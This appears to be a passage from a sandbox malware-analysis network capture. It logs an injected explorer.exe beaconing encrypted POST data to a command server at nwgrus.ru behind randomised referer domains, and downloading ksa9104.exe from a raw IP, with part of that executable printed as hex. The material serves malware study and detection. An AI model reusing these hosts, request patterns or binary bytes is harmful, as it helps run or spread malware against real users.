Oct 11, 2024 06:38:09.241612911 CEST	323	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 78 43 c9 9b Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuxC]'zIlzf=ljAUi{kwI:STOPK\Z07UVg+\ULZ/\;c-zc+sFl$oQ8!
Oct 11, 2024 06:38:10.504018068 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50664	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:10.513645887 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tvxqtlroqjamdu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 11, 2024 06:38:10.513672113 CEST	131	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 64 39 d1 ae Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vud9DdxTlJ0^ps a02[*
Oct 11, 2024 06:38:12.056718111 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50850	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:39:20.253727913 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qiqpuprruvmqycfg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: nwgrus.ru
Oct 11, 2024 06:39:20.253737926 CEST	239	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 59 52 a2 ee Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vuYRxfvqqE)QHV=`b@EPLu]%RfSh7@%E^y`u! ?9QvbT\O\7Mm7R
Oct 11, 2024 06:39:21.575018883 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:39:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50851	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:39:27.307861090 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ducngusiibkxomb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: nwgrus.ru
Oct 11, 2024 06:39:27.307879925 CEST	204	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 5c c6 a8 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vus\\VYk^E?,D4;92H[z*R;S"`5X8#2)[lbK0=/
Oct 11, 2024 06:39:28.713341951 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:39:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50852	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:39:35.071202993 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://itbfgbtaejscu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: nwgrus.ru
Oct 11, 2024 06:39:35.071230888 CEST	173	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 2b ac b5 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vu1+}`~`6!21g@2XgH]8aN)N3#pW2_/
Oct 11, 2024 06:39:36.315859079 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:39:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50853	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:39:43.732719898 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fmklqfxisct.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 115 Host: nwgrus.ru
Oct 11, 2024 06:39:43.732743979 CEST	115	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 2e ef a1 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vub.~_Lq"ka{t>t/
Oct 11, 2024 06:39:44.998517036 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:39:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50854	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:39:54.201596022 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ukccamwydghjkfi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: nwgrus.ru
Oct 11, 2024 06:39:54.201617956 CEST	253	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 45 ba e0 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vubEx*wL`.SO%nD@l\S.<E5(;PWG,]0rR>l23t{`s7'A42[e2>LX=k?>
Oct 11, 2024 06:39:55.430552006 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:39:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50855	186.233.231.45	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:40:07.588702917 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nkxctepgnvx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: nwgrus.ru
Oct 11, 2024 06:40:07.588721991 CEST	253	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 0c e5 bd Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vuN#\S!S[Svm:`RX$87oS>iW`,/yy*/V6\|aqTBSQy}Y)_Eu4G6
Oct 11, 2024 06:40:08.776712894 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:40:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50856	186.233.231.45	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:40:20.400799036 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ijdjdfrkcsdu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 170 Host: nwgrus.ru
Oct 11, 2024 06:40:20.400823116 CEST	170	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 54 3a c8 fc Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vuT:xeAOb"\^ _a8E^xtY1BvU>4EZ)q,iO<
Oct 11, 2024 06:40:21.583488941 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:40:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50857	186.233.231.45	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:40:33.590082884 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://virsnusoyawwgc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: nwgrus.ru
Oct 11, 2024 06:40:33.594959021 CEST	311	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 14 be ac Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vu<^aM}VIaHCX\%q*<q{Q\544'YOcUMVu['M]k7}RR9T,!
Oct 11, 2024 06:40:34.773993969 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:40:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	50858	186.233.231.45	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:40:46.048886061 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mtnalmdiriqcam.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: nwgrus.ru
Oct 11, 2024 06:40:46.048918962 CEST	223	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 1c e0 fc Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vusY0\|v3^-{Lsc)`1#[]3_:N3#zxCo\G^Yvr;W#V2"ajU~
Oct 11, 2024 06:40:47.321197987 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:40:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50859	186.233.231.45	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:40:58.699985027 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://chjuadirxhpxkwiq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: nwgrus.ru
Oct 11, 2024 06:40:58.699999094 CEST	122	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 1e bd 99 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vuZ0jI?3\2s
Oct 11, 2024 06:40:59.976272106 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:40:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	50575	23.145.40.164	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 04:37:57 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-10-11 04:37:57 UTC	327	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 04:37:57 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Fri, 11 Oct 2024 04:30:03 GMT ETag: "3bc00-6242bf0d5f636" Accept-Ranges: bytes Content-Length: 244736 Connection: close Content-Type: application/x-msdos-program
2024-10-11 04:37:57 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d0 0e fe a1 94 6f 90 f2 94 6f 90 f2 94 6f 90 f2 8a 3d 14 f2 8e 6f 90 f2 8a 3d 05 f2 84 6f 90 f2 8a 3d 13 f2 de 6f 90 f2 b3 a9 eb f2 91 6f 90 f2 94 6f 91 f2 fb 6f 90 f2 8a 3d 1a f2 95 6f 90 f2 8a 3d 04 f2 95 6f 90 f2 8a 3d 01 f2 95 6f 90 f2 52 69 63 68 94 6f 90 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 91 22 b7 64 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ooo=o=o=oooo=o=o=oRichoPEL"d
2024-10-11 04:37:57 UTC	8000	IN	Data Raw: 83 ec 14 56 57 ff 75 08 8d 4d ec e8 64 ff ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30 3b f7 75 2c e8 30 ea ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 aa 12 00 00 83 c4 14 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 33 c0 e9 d8 01 00 00 39 7d 14 74 0c 83 7d 14 02 7c c9 83 7d 14 24 7f c3 8b 4d ec 53 8a 1e 89 7d fc 8d 7e 01 83 b9 ac 00 00 00 01 7e 17 8d 45 ec 50 0f b6 c3 6a 08 50 e8 1a 2c 00 00 8b 4d ec 83 c4 0c eb 10 8b 91 c8 00 00 00 0f b6 c3 0f b7 04 42 83 e0 08 85 c0 74 05 8a 1f 47 eb c7 80 fb 2d 75 06 83 4d 18 02 eb 05 80 fb 2b 75 03 8a 1f 47 8b 45 14 85 c0 0f 8c 4b 01 00 00 83 f8 01 0f 84 42 01 00 00 83 f8 24 0f 8f 39 01 00 00 85 c0 75 2a 80 fb 30 74 09 c7 45 14 0a 00 00 00 eb 34 8a 07 3c 78 74 0d 3c 58 74 09 c7 45 14 08 00 00 00 eb 21 c7 45 14 10 00 00 Data Ascii: VWuMdEu3;t0;u,0WWWWW}tE`p39}t}\|}$MS}~~EPjP,MBtG-uM+uGEKB$9u*0tE4<xt<XtE!E
2024-10-11 04:37:57 UTC	8000	IN	Data Raw: a3 b8 9b 41 00 ff d6 50 e8 22 ec ff ff 59 a3 c0 9b 41 00 85 c0 74 14 68 94 68 41 00 57 ff d6 50 e8 0a ec ff ff 59 a3 bc 9b 41 00 a1 bc 9b 41 00 3b c3 74 4f 39 1d c0 9b 41 00 74 47 50 e8 68 ec ff ff ff 35 c0 9b 41 00 8b f0 e8 5b ec ff ff 59 59 8b f8 85 f6 74 2c 85 ff 74 28 ff d6 85 c0 74 19 8d 4d f8 51 6a 0c 8d 4d ec 51 6a 01 50 ff d7 85 c0 74 06 f6 45 f4 01 75 09 81 4d 10 00 00 20 00 eb 39 a1 b4 9b 41 00 3b c3 74 30 50 e8 18 ec ff ff 59 85 c0 74 25 ff d0 89 45 fc 85 c0 74 1c a1 b8 9b 41 00 3b c3 74 13 50 e8 fb eb ff ff 59 85 c0 74 08 ff 75 fc ff d0 89 45 fc ff 35 b0 9b 41 00 e8 e3 eb ff ff 59 85 c0 74 10 ff 75 10 ff 75 0c ff 75 08 ff 75 fc ff d0 eb 02 33 c0 5f 5e 5b c9 c3 8b ff 55 8b ec 8b 45 08 53 33 db 56 57 3b c3 74 07 8b 7d 0c 3b fb 77 1b e8 17 ca ff Data Ascii: AP"YAthhAWPYAA;tO9AtGPh5A[YYt,t(tMQjMQjPtEuM 9A;t0PYt%EtA;tPYtuE5AYtuuuu3_^[UES3VW;t};w
2024-10-11 04:37:57 UTC	8000	IN	Data Raw: 00 eb 05 a1 08 9c 41 00 83 f8 02 0f 84 cf 00 00 00 3b c3 0f 84 c7 00 00 00 83 f8 01 0f 85 e8 00 00 00 89 5d f8 39 5d 18 75 08 8b 07 8b 40 04 89 45 18 8b 35 6c 61 41 00 33 c0 39 5d 20 53 53 ff 75 10 0f 95 c0 ff 75 0c 8d 04 c5 01 00 00 00 50 ff 75 18 ff d6 8b f8 3b fb 0f 84 ab 00 00 00 7e 3c 81 ff f0 ff ff 7f 77 34 8d 44 3f 08 3d 00 04 00 00 77 13 e8 fe 04 00 00 8b c4 3b c3 74 1c c7 00 cc cc 00 00 eb 11 50 e8 66 a7 ff ff 59 3b c3 74 09 c7 00 dd dd 00 00 83 c0 08 8b d8 85 db 74 69 8d 04 3f 50 6a 00 53 e8 3a db ff ff 83 c4 0c 57 53 ff 75 10 ff 75 0c 6a 01 ff 75 18 ff d6 85 c0 74 11 ff 75 14 50 53 ff 75 08 ff 15 78 61 41 00 89 45 f8 53 e8 c9 fa ff ff 8b 45 f8 59 eb 75 33 f6 39 5d 1c 75 08 8b 07 8b 40 14 89 45 1c 39 5d 18 75 08 8b 07 8b 40 04 89 45 18 ff 75 1c Data Ascii: A;]9]u@E5laA39] SSuuPu;~<w4D?=w;tPfY;tti?PjS:WSuujutuPSuxaAESEYu39]u@E9]u@Eu
2024-10-11 04:37:57 UTC	8000	IN	Data Raw: 5b c2 8d d6 c4 27 91 8e 7e f8 55 4b 16 bb 3e a7 34 f2 53 59 d0 13 05 48 83 20 ea 11 fd 52 24 9a 51 44 bb 31 a6 b5 d9 82 77 8b 2d 89 1c c7 53 c9 5a 7f 2f 0c 50 a9 f8 43 a6 d9 80 3e d4 c7 99 1a 24 d3 f0 78 75 97 71 8e ff d2 d8 9f 5d d2 cf b8 63 23 36 f0 d6 ac 11 20 58 22 28 b5 ff dc ff 07 b3 c8 4a 31 4d 6d 3d 39 d7 12 ba d6 2b 89 5a 29 ac 60 d0 8e a9 ae f8 c5 41 86 83 fa be 1a 93 21 de 19 ae 94 38 47 fb 5e fd 56 04 2d d6 9e ba 67 71 58 5f f3 6d 74 22 0d 15 a1 31 b5 68 04 17 a8 4e 6f 90 fa a8 89 8e e1 60 7b 19 06 4e 62 46 f1 42 ff 73 f3 96 f8 7e 6b 25 99 7e 58 e2 80 e3 83 63 a0 25 55 2c 97 ed 06 e5 42 f6 20 b6 bc 26 29 62 12 1f f6 04 28 cc b1 ae 6f 07 52 c3 b0 0e 80 b5 79 35 e3 2c ce ee 73 0d c8 a0 68 e2 4b 0d 84 42 6c 36 73 a6 1d 84 88 cf 72 ff 41 6e 55 f1 Data Ascii: ['~UK>4SYH R$QD1w-SZ/PC>$xuq]c#6 X"(J1Mm=9+Z)`A!8G^V-gqX_mt"1hNo`{NbFBs~k%~Xc%U,B &)b(oRy5,shKBl6srAnU
2024-10-11 04:37:58 UTC	8000	IN	Data Raw: d1 19 fe 86 90 a0 25 a8 0a 1d 53 63 bf 38 d3 3f 5c bd 65 07 81 a9 72 ab a7 78 2b da 22 53 9a 46 66 89 5a c1 eb de 3f b5 0e 88 58 ab 1b ab 39 e7 77 d7 68 ff 36 0c 85 2d 81 fb 77 b9 1f bf eb ae a5 f1 44 71 06 70 49 f4 5a 0b e6 68 9c f9 fe 86 7a 2f 21 73 da 9b bb f2 f4 d4 b8 50 25 c4 2b 74 1c ad 54 4d 4c 51 76 8e 66 a6 2a fc ae 4f 2a a2 28 79 60 84 39 1e 77 e9 2f 10 f7 ec 44 61 ca b7 a6 02 13 ab cf f6 47 3d d9 8e 28 69 3c da ac 25 46 94 5b 6b cd 0d 49 23 b3 e5 d4 a1 bb ed 36 11 50 3e 5d 1a bc 7b 62 bf 73 49 34 84 8a 01 3d 5d 7c 18 02 bc 93 ff 59 10 be 4a de bf 19 82 ef 54 ee 32 82 e1 ce a8 09 37 19 89 bd 75 8b 10 f9 d6 f2 a5 27 d6 6e 76 bc a4 28 e0 58 d6 63 46 9a cb ac 33 57 24 6f 9a a1 02 8d da 3c 2d 48 c3 ea 82 c0 56 94 eb 52 4e a2 